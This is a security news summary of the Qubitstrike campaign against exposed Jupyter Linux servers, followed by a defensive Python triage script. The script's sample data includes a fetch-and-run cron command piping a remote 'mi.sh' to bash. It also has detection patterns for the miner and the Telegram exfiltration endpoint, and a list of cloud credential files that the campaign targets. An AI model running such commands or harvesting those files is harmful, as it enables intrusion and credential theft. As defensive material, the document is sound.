Qubitstrike attacks rootkit Jupyter Linux servers to steal credentials

October 18, 2023 at 08:02AM

Hackers are targeting internet-exposed Jupyter Notebooks to breach Linux servers and deploy malware, including a Linux rootkit, crypto miners, and credential-stealing scripts. The campaign, called ‘Qubitstrike,’ hijacks the compromised servers for cryptomining and steals credentials for cloud services. Its payloads are hosted on codeberg.org, reportedly the first time this platform has been observed distributing malware. The attackers scan for exposed notebooks, gain code execution through them, and then run a series of scripts on the compromised host to establish persistence, mine cryptocurrency, and harvest credentials. Qubitstrike also loads the open-source Diamorphine rootkit to hide its running scripts and malware payloads.

Summary:

– Hackers are targeting internet-exposed Jupyter Notebooks to breach servers and deploy malware.
– The Qubitstrike toolset consists of a Linux rootkit, crypto miners, and credential-stealing scripts; ‘PyLoose’ is the name of an earlier, separate campaign that also targeted exposed Jupyter Notebooks.
– Qubitstrike is a new campaign that hijacks Linux servers for cryptomining and credential theft.
– The Qubitstrike malware payloads are hosted on codeberg.org for the first time.
– The attack begins with a scan for internet-exposed Jupyter Notebooks; once inside, the attacker identifies the host CPU to judge its mining potential.
– The attacker then downloads and executes a shell script called ‘mi.sh’, which drives the rest of the intrusion.
– ‘mi.sh’ downloads and runs an XMRig miner, registers cron jobs for persistence, adds the attacker’s SSH key to the root account’s authorized keys, installs the ‘Diamorphine’ rootkit, and harvests credentials.
– Qubitstrike also deploys a further component named “kthreadd”, a name it shares with the kernel’s own kthreadd thread so that it blends into process listings.
– The transfer utilities ‘curl’ and ‘wget’ are renamed, and log files are wiped to hinder response and cover the attacker’s traces.
– The Diamorphine rootkit is used to hide the presence of scripts and malware payloads.
– Qubitstrike searches for credentials in specific directories and sends them back to the attackers using the Telegram Bot API.
– The attacker’s profile on Telegram shows an IP address from Tunisia and the use of Kali Linux.
– Discord is used for command and control operations and data exfiltration.
– The attacker’s Discord nickname is ‘BlackSUN’, server named ‘NETShadow,’ and channels named ‘victims’ and ‘ssh’.
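The tradecraft listed above (cron persistence, an added root SSH key, renamed curl/wget, wiped logs, a hidden kernel module, harvested cloud credential files, and an openly exposed Jupyter server) gives a responder a concrete checklist. The script below is an added example written for this page, not code from the article, BleepingComputer, or Cado Security. It runs over a snapshot dict of `{path: contents}` so it can be exercised offline on constructed sample data; `snapshot_from_root()` builds the same dict from a live host. The indicator strings, file paths, and the sample snapshot are assumptions drawn from the summary, not published IoCs.

```python
"""Host triage for Qubitstrike-style indicators (added example, not the article's code)."""
import os
import re

# Constructed indicator patterns: payload hosting, loader name, miner, exfil endpoint.
CRON_INDICATORS = re.compile(r"codeberg\.org|\bmi\.sh\b|xmrig|api\.telegram\.org/bot", re.I)
CRON_PATHS = ("/etc/crontab", "/var/spool/cron/crontabs/root", "/var/spool/cron/root")
TRANSFER_TOOLS = ("/usr/bin/curl", "/usr/bin/wget")
LOG_FILES = ("/var/log/wtmp", "/var/log/btmp", "/var/log/lastlog", "/var/log/auth.log", "/var/log/syslog")
# Assumed harvest targets: the summary says "specific directories" without listing them.
CREDENTIAL_FILES = ("/root/.aws/credentials", "/root/.config/gcloud/credentials.db",
                    "/root/.kube/config", "/root/.docker/config.json", "/root/.ssh/id_rsa")
JUPYTER_CONFIGS = ("/root/.jupyter/jupyter_server_config.py", "/root/.jupyter/jupyter_notebook_config.py")
AUTHORIZED_KEYS = "/root/.ssh/authorized_keys"


def snapshot_from_root(root="/"):
    """Collect the files above from a real filesystem into {path: text}. Run as root."""
    snap = {}
    for path in CRON_PATHS + TRANSFER_TOOLS + LOG_FILES + CREDENTIAL_FILES + JUPYTER_CONFIGS \
            + (AUTHORIZED_KEYS, "/proc/modules"):
        full = os.path.join(root, path.lstrip("/"))
        try:
            with open(full, "rb") as fh:          # first 4 KiB is enough for every check here
                snap[path] = fh.read(4096).decode("utf-8", "replace")
        except OSError:
            pass                                   # absent or unreadable: leave it out
    sysmod = os.path.join(root, "sys/module")
    loadable = []
    if os.path.isdir(sysmod):                      # built-ins have no initstate; loaded modules do
        loadable = [n for n in os.listdir(sysmod) if os.path.exists(os.path.join(sysmod, n, "initstate"))]
    snap["/sys/module"] = "\n".join(sorted(loadable))
    return snap


def cron_indicators(snap):
    """Cron lines referencing the payload host, loader script, miner, or Telegram exfil."""
    return [(p, line.strip()) for p in CRON_PATHS
            for line in (snap.get(p) or "").splitlines() if CRON_INDICATORS.search(line)]


def unknown_ssh_keys(snap, baseline_blobs):
    """authorized_keys entries whose key blob is not in the operator's baseline."""
    unknown = []
    for line in (snap.get(AUTHORIZED_KEYS) or "").splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[1] not in baseline_blobs:
            unknown.append(line.strip())
    return unknown


def missing_transfer_tools(snap):
    """curl/wget gone from their usual path: the campaign renames them."""
    return [p for p in TRANSFER_TOOLS if p not in snap]


def wiped_logs(snap):
    """Log files that exist but are empty, the mark of a crude truncation-style wipe."""
    return [p for p in LOG_FILES if p in snap and snap[p] == ""]


def hidden_modules(snap):
    """Loaded modules present in sysfs but missing from /proc/modules.
    Assumption: the rootkit unlinks itself from the kernel module list (which feeds
    /proc/modules and lsmod) while its /sys/module directory remains."""
    listed = {ln.split()[0] for ln in (snap.get("/proc/modules") or "").splitlines() if ln.split()}
    sysfs = {n for n in (snap.get("/sys/module") or "").splitlines() if n}
    return sorted(sysfs - listed)


def harvestable_credentials(snap):
    """Credential files present on the host: everything here must be rotated after compromise."""
    return [p for p in CREDENTIAL_FILES if p in snap]


def exposed_jupyter(snap):
    """Jupyter configs that bind all interfaces and set an empty token (no authentication)."""
    bind_all = re.compile(r"c\.(ServerApp|NotebookApp)\.ip\s*=\s*['\"](0\.0\.0\.0|\*)['\"]")
    no_token = re.compile(r"c\.(ServerApp|NotebookApp|IdentityProvider)\.token\s*=\s*(['\"])\2")
    return [p for p in JUPYTER_CONFIGS
            if bind_all.search(snap.get(p) or "") and no_token.search(snap.get(p) or "")]


def triage(snap, baseline_blobs):
    """Run every check and return only the ones that fired."""
    results = {
        "cron": cron_indicators(snap), "ssh_keys": unknown_ssh_keys(snap, baseline_blobs),
        "renamed_tools": missing_transfer_tools(snap), "wiped_logs": wiped_logs(snap),
        "hidden_modules": hidden_modules(snap), "credentials": harvestable_credentials(snap),
        "exposed_jupyter": exposed_jupyter(snap),
    }
    return {k: v for k, v in results.items() if v}


# Constructed sample snapshot of a compromised host; the URL and keys are fabricated, not real IoCs.
SAMPLE = {
    "/etc/crontab": "SHELL=/bin/sh\n17 * * * * root cd / && run-parts /etc/cron.hourly\n",
    "/var/spool/cron/crontabs/root": "*/30 * * * * curl -s https://codeberg.org/EXAMPLE/mi.sh | bash\n",
    AUTHORIZED_KEYS: "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOpsBaselineKey ops@bastion\n"
                     "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCunknown root@kali\n",
    "/usr/bin/wget": "\x7fELF...",                 # curl is deliberately absent (renamed)
    "/var/log/wtmp": "",                          # truncated
    "/var/log/auth.log": "Oct 18 08:02:11 host sshd[4411]: Accepted publickey for root\n",
    "/proc/modules": "ext4 786432 2 - Live 0x0000000000000000\n",
    "/sys/module": "ext4\ndiamorphine",
    "/root/.aws/credentials": "[default]\naws_access_key_id = AKIAEXAMPLE\n",
    "/root/.jupyter/jupyter_server_config.py": "c.ServerApp.ip = '0.0.0.0'\nc.ServerApp.token = ''\n",
}
BASELINE_KEYS = {"AAAAC3NzaC1lZDI1NTE5AAAAIOpsBaselineKey"}

if __name__ == "__main__":
    for check, finding in triage(SAMPLE, BASELINE_KEYS).items():
        print(f"{check}: {finding}")
```

Two caveats on running this against a live host. A file-hiding rootkit can conceal its own files and processes from userland, so an empty result proves little; the sysfs-versus-/proc divergence is the one check above that still works because Diamorphine only unlinks itself from the module list, and Diamorphine's documented default signal toggle (`kill -63 0` makes the module visible again) is a quick live confirmation. Better still is to triage a disk image or snapshot taken from outside the host, where the rootkit has no say in what you read.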

